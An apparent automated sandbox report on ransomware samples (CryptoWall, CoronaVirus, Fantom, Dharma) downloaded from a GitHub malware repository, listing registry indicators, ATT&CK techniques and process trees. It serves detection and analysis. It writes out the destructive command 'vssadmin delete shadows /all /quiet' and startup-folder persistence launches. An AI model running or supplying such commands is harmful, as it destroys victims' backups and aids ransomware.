Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fantom.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mssql2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Dharma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CryptoWall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nc123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CoronaVirus.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SearchHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
16304	vssadmin.exe
15720	vssadmin.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133871457072063139"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1736937623-2710279395-1526620350-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1736937623-2710279395-1526620350-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1736937623-2710279395-1526620350-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Moniker = "cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1736937623-2710279395-1526620350-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children	chrome.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\CryptoWall.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\CoronaVirus.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Fantom.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Dharma.exe:Zone.Identifier	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
11212	chrome.exe
11212	chrome.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe
1616	CoronaVirus.exe

Suspicious behavior: LoadsDriver 32 IoCs

pid	Process
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe
18580	mssql.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1976	CryptoWall.exe
2888	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
700	chrome.exe
700	chrome.exe
700	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe
Token: SeShutdownPrivilege	700	chrome.exe
Token: SeCreatePagefilePrivilege	700	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
700	chrome.exe
18960	SearchHost.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
18580	mssql.exe
18644	mssql2.exe
18960	SearchHost.exe
18580	mssql.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 700 wrote to memory of 972	700	chrome.exe	81
PID 700 wrote to memory of 972	700	chrome.exe	81
PID 700 wrote to memory of 4944	700	chrome.exe	82
PID 700 wrote to memory of 4944	700	chrome.exe	82
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 820	700	chrome.exe	83
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85
PID 700 wrote to memory of 4896	700	chrome.exe	85

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
19268	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91685dcf8,0x7ff91685dd04,0x7ff91685dd10
  2⤵
  PID:972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1432,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2140 /prefetch:11
  2⤵
  - Downloads MZ/PE file
  PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2112,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2108 /prefetch:2
  2⤵
  PID:820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2340,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2484 /prefetch:13
  2⤵
  PID:4896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:2948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:4812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4164,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4176 /prefetch:9
  2⤵
  PID:1044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5112,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5092 /prefetch:14
  2⤵
  PID:3288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5108,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5052 /prefetch:14
  2⤵
  PID:3452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=212,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4972 /prefetch:14
  2⤵
  PID:2344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5392,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5404 /prefetch:14
  2⤵
  PID:716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5536,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5552 /prefetch:14
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:2552
- C:\Users\Admin\Downloads\CryptoWall.exe
  "C:\Users\Admin\Downloads\CryptoWall.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:1976
- - C:\Windows\SysWOW64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    3⤵
    - Drops startup file
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:2888
  - - C:\Windows\SysWOW64\svchost.exe
      -k netsvcs
      4⤵
      System Location Discovery: System Language Discovery
      PID:4212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5916,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4272 /prefetch:14
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:3824
- C:\Users\Admin\Downloads\CoronaVirus.exe
  "C:\Users\Admin\Downloads\CoronaVirus.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1616
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    3⤵
    PID:4960
  - - C:\Windows\system32\mode.com
      mode con cp select=1251
      4⤵
      PID:10336
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:16304
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    3⤵
    PID:18324
  - - C:\Windows\system32\mode.com
      mode con cp select=1251
      4⤵
      PID:16256
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:15720
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
    3⤵
    PID:16224
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
    3⤵
    PID:16144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=4824,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4296 /prefetch:10
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:11212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5556,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5860 /prefetch:14
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:14904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5980,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5948 /prefetch:14
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:14756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5644,i,2321627841413974915,17101140362601143931,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5948 /prefetch:14
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:14552
- C:\Users\Admin\Downloads\Fantom.exe
  "C:\Users\Admin\Downloads\Fantom.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:14252
- C:\Users\Admin\Downloads\Dharma.exe
  "C:\Users\Admin\Downloads\Dharma.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:17724
- - C:\Users\Admin\Downloads\ac\nc123.exe
    "C:\Users\Admin\Downloads\ac\nc123.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:18512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      System Location Discovery: System Language Discovery
      PID:19060
- - C:\Users\Admin\Downloads\ac\mssql.exe
    "C:\Users\Admin\Downloads\ac\mssql.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Impair Defenses: Safe Mode Boot
    - Suspicious behavior: LoadsDriver
